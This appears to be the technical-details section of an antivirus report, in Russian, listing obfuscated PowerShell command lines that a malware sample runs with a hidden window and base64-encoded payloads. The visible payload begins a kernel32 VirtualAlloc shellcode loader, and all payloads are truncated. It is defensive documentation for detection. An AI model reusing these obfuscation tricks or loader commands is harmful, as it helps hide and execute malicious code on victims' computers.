Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v nUE -;s''v Ai e''c;s''v Eo ((g''v nUE).value.toString()+(g''v Ai).value.toString());powershell (g''v Eo).value.toString() ('JABVAFoAIAA9ACAAJwAkAFIAdgAgAD0AIAAnACcAWwBEAGwAbABJAG0...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v nUE -;s''v Ai e''c;s''v Eo ((g''v nUE).value.toString()+(g''v Ai).value.toString());powershell (g''v Eo).value.toString() ('JABVAFoAIAA9ACAAJwAkAFIAdgAgAD0AIAAnACcAWwBEAGwAbABJAG0...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABVAFoAIAA9ACAAJwAkAFIAdgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e''c JABSAHYAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB...